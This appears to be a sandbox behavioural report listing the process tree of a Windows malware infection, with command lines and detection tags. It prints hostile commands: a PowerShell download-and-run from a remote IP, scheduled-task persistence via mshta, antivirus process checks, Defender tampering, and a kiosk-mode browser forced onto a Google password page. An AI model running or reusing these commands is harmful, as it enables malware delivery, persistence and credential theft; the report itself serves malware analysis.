C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2496,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=2652 /prefetch:811⤵PID:6304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3452,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:111⤵
- Uses browser remote debugging
PID:4720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3468,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:111⤵
- Uses browser remote debugging
PID:3356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4668,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=5072 /prefetch:811⤵PID:4304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4664,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=5092 /prefetch:811⤵PID:6536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5064,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=5428 /prefetch:811⤵PID:4684
-
-
-
C:\ProgramData\ec2v37y5fu.exe"C:\ProgramData\ec2v37y5fu.exe"10⤵PID:6352
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:5684
-
-
-
C:\ProgramData\u3wt00hvk6.exe"C:\ProgramData\u3wt00hvk6.exe"10⤵PID:5768
-
C:\ProgramData\u3wt00hvk6.exe"C:\ProgramData\u3wt00hvk6.exe"11⤵PID:5696
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"12⤵PID:6276
-
-
C:\Users\Admin\AppData\Local\VnWh6CU8C84G.exe"C:\Users\Admin\AppData\Local\VnWh6CU8C84G.exe"12⤵PID:25468
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"13⤵PID:25508
-
-
-
C:\Users\Admin\AppData\Local\LbHT8dDbmH9H.exe"C:\Users\Admin\AppData\Local\LbHT8dDbmH9H.exe"12⤵PID:18948
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"13⤵PID:19064
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"14⤵
- Uses browser remote debugging
PID:37864 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ff8d122dcf8,0x7ff8d122dd04,0x7ff8d122dd1015⤵PID:6332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2380,i,288668959391273900,11031321907195467619,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2376 /prefetch:215⤵PID:37332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1568,i,288668959391273900,11031321907195467619,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2416 /prefetch:315⤵PID:37320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2080,i,288668959391273900,11031321907195467619,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2384 /prefetch:815⤵PID:37316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,288668959391273900,11031321907195467619,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3292 /prefetch:115⤵
- Uses browser remote debugging
PID:37280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3216,i,288668959391273900,11031321907195467619,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3236 /prefetch:115⤵
- Uses browser remote debugging
PID:37292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3932,i,288668959391273900,11031321907195467619,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3948 /prefetch:215⤵
- Uses browser remote debugging
PID:37216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4448,i,288668959391273900,11031321907195467619,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4412 /prefetch:115⤵
- Uses browser remote debugging
PID:36096
-
-
-
-
-
C:\Users\Admin\AppData\Local\6kTicgxQznbR.exe"C:\Users\Admin\AppData\Local\6kTicgxQznbR.exe"12⤵PID:19436
-
C:\Users\Admin\AppData\Local\Temp\oLiIppxT\pcBPDzBDPDaZfrD7.exeC:\Users\Admin\AppData\Local\Temp\oLiIppxT\pcBPDzBDPDaZfrD7.exe 013⤵PID:25368
-
C:\Users\Admin\AppData\Local\Temp\oLiIppxT\drisxg22eTbKb0jV.exeC:\Users\Admin\AppData\Local\Temp\oLiIppxT\drisxg22eTbKb0jV.exe 2536814⤵PID:18016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 25368 -s 68814⤵
- Program crash
PID:27796
-
-
-
-
-
-
C:\ProgramData\s00z58g4wt.exe"C:\ProgramData\s00z58g4wt.exe"10⤵PID:644
-
C:\Users\Admin\AppData\Local\Temp\PdxWM4xU\IaUVbBF4DrdN3I5R.exeC:\Users\Admin\AppData\Local\Temp\PdxWM4xU\IaUVbBF4DrdN3I5R.exe 011⤵PID:2612
-
C:\Users\Admin\AppData\Local\Temp\PdxWM4xU\RMnfRdA3YGBlmUMr.exeC:\Users\Admin\AppData\Local\Temp\PdxWM4xU\RMnfRdA3YGBlmUMr.exe 261212⤵PID:6944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 127213⤵
- Program crash
PID:25404
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 108412⤵
- Program crash
PID:18104
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\zctrq" & exit10⤵PID:16932
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1111⤵
- Delays execution with timeout.exe
PID:18268
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2688 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:740
-
-
-
C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2160 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5448
-
-
-
C:\Users\Admin\AppData\Local\Temp\10046340101\c8993dd17a.exe"C:\Users\Admin\AppData\Local\Temp\10046340101\c8993dd17a.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5320 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat9⤵
- System Location Discovery: System Language Discovery
PID:2096 -
C:\Windows\SysWOW64\tasklist.exetasklist10⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"10⤵
- System Location Discovery: System Language Discovery
PID:6428
-
-
C:\Windows\SysWOW64\tasklist.exetasklist10⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"10⤵
- System Location Discovery: System Language Discovery
PID:4176
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 67418710⤵
- System Location Discovery: System Language Discovery
PID:7068
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Funky.wbk10⤵
- System Location Discovery: System Language Discovery
PID:6384
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Und" Tournament10⤵
- System Location Discovery: System Language Discovery
PID:6200
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 674187\Constraints.com + Lu + Pepper + Cn + Hairy + Nose + Providence + Bra + Corresponding + Promo + Ending 674187\Constraints.com10⤵
- System Location Discovery: System Language Discovery
PID:6224
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Losses.wbk + ..\Finally.wbk + ..\Medications.wbk + ..\Borough.wbk + ..\Trim.wbk + ..\Ellis.wbk + ..\Truly.wbk + ..\Was.wbk r10⤵
- System Location Discovery: System Language Discovery
PID:6256
-
-
C:\Users\Admin\AppData\Local\Temp\674187\Constraints.comConstraints.com r10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3220
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 510⤵
- System Location Discovery: System Language Discovery
PID:6800
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1284 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3080
-
-
-
C:\Users\Admin\AppData\Local\Temp\10050360101\Amadey.exe"C:\Users\Admin\AppData\Local\Temp\10050360101\Amadey.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6516 -
C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe"C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6844
-
-
-
C:\Users\Admin\AppData\Local\Temp\10051520101\abd9625a86.exe"C:\Users\Admin\AppData\Local\Temp\10051520101\abd9625a86.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6924 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10051520101\abd9625a86.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6340
-
-
-
C:\Users\Admin\AppData\Local\Temp\10051530101\eb5f738682.exe"C:\Users\Admin\AppData\Local\Temp\10051530101\eb5f738682.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:448 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10051530101\eb5f738682.exe"9⤵
- Executes dropped EXE
PID:2180
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10451860101\trOUuPI.exe"C:\Users\Admin\AppData\Local\Temp\10451860101\trOUuPI.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5928 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:4316
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:3240
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4464
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453070101\UU0LfLZ.exe"C:\Users\Admin\AppData\Local\Temp\10453070101\UU0LfLZ.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1456
-
-
C:\Users\Admin\AppData\Local\Temp\10453880101\c48d7ad7ca.exe"C:\Users\Admin\AppData\Local\Temp\10453880101\c48d7ad7ca.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4920 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn f1kvDmaiSyf /tr "mshta C:\Users\Admin\AppData\Local\Temp\6USQMgDD8.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:4024 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn f1kvDmaiSyf /tr "mshta C:\Users\Admin\AppData\Local\Temp\6USQMgDD8.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:684
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\6USQMgDD8.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832 -
C:\Users\Admin\AppData\Local\TempJIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE"C:\Users\Admin\AppData\Local\TempJIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4988
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453890101\9b14f9cb38.exe"C:\Users\Admin\AppData\Local\Temp\10453890101\9b14f9cb38.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4232
-
-
C:\Users\Admin\AppData\Local\Temp\10453900101\3f2e1d5910.exe"C:\Users\Admin\AppData\Local\Temp\10453900101\3f2e1d5910.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2304 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10453900101\3f2e1d5910.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5260
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453910101\3c45e50620.exe"C:\Users\Admin\AppData\Local\Temp\10453910101\3c45e50620.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4608 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10453910101\3c45e50620.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4536
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453920101\a8afec1b66.exe"C:\Users\Admin\AppData\Local\Temp\10453920101\a8afec1b66.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6980
-
-
C:\Users\Admin\AppData\Local\Temp\10453930101\eb5f738682.exe"C:\Users\Admin\AppData\Local\Temp\10453930101\eb5f738682.exe"6⤵
- Checks BIOS information in registry
- Executes dropped EXE
PID:4204
-
-
C:\Users\Admin\AppData\Local\Temp\10453940101\92286f2337.exe"C:\Users\Admin\AppData\Local\Temp\10453940101\92286f2337.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1864 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5144
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6296
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4040
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6648
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6660
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:6780
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1096 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1992 -prefsLen 27099 -prefMapHandle 1996 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {057c216b-2b31-43de-8c9c-5c4810e5cca0} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:4900
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2464 -prefsLen 27135 -prefMapHandle 2468 -prefMapSize 270279 -ipcHandle 2476 -initialChannelId {055034e5-f9b4-471c-90d1-a5fabdb26df6} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:6824
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3796 -prefsLen 25164 -prefMapHandle 3800 -prefMapSize 270279 -jsInitHandle 3804 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3812 -initialChannelId {3879ec5e-5d7b-495e-8973-bb42715b2b61} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:1588
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3956 -prefsLen 27276 -prefMapHandle 3960 -prefMapSize 270279 -ipcHandle 4052 -initialChannelId {04a9c26d-7a44-40fd-858c-8ca8b575fba7} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:4700
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 1644 -prefsLen 34775 -prefMapHandle 2840 -prefMapSize 270279 -jsInitHandle 3240 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3192 -initialChannelId {145a3876-c9dd-4a1e-9187-eb414c09aff4} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:5552
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5068 -prefsLen 35012 -prefMapHandle 5072 -prefMapSize 270279 -ipcHandle 5080 -initialChannelId {7ee60587-b736-4df3-b5a9-73f39cd700ce} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:4512
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5248 -prefsLen 32900 -prefMapHandle 5252 -prefMapSize 270279 -jsInitHandle 5256 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5264 -initialChannelId {73621480-8303-43ff-b8be-899fc8b5f8bf} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:2956
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5456 -prefsLen 32952 -prefMapHandle 5460 -prefMapSize 270279 -jsInitHandle 5464 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5472 -initialChannelId {374fa1a3-65f1-439f-8478-4c2da8260b0f} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:5788
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5656 -prefsLen 32952 -prefMapHandle 5660 -prefMapSize 270279 -jsInitHandle 5664 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5476 -initialChannelId {d91ebac0-15ea-4464-9ce1-11a9f3c4bbff} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:2260
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10453950101\26e3163963.exe"C:\Users\Admin\AppData\Local\Temp\10453950101\26e3163963.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
C:\Users\Admin\AppData\Local\Temp\10453960101\Mbxp0H9.exe"C:\Users\Admin\AppData\Local\Temp\10453960101\Mbxp0H9.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6808 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:3028 -
C:\Users\Admin\AppData\Roaming\93Q6JeiQLY.exe"C:\Users\Admin\AppData\Roaming\93Q6JeiQLY.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5736 -
C:\Users\Admin\AppData\Roaming\93Q6JeiQLY.exe"C:\Users\Admin\AppData\Roaming\93Q6JeiQLY.exe" h9⤵
- Executes dropped EXE
PID:2140
-
-
-
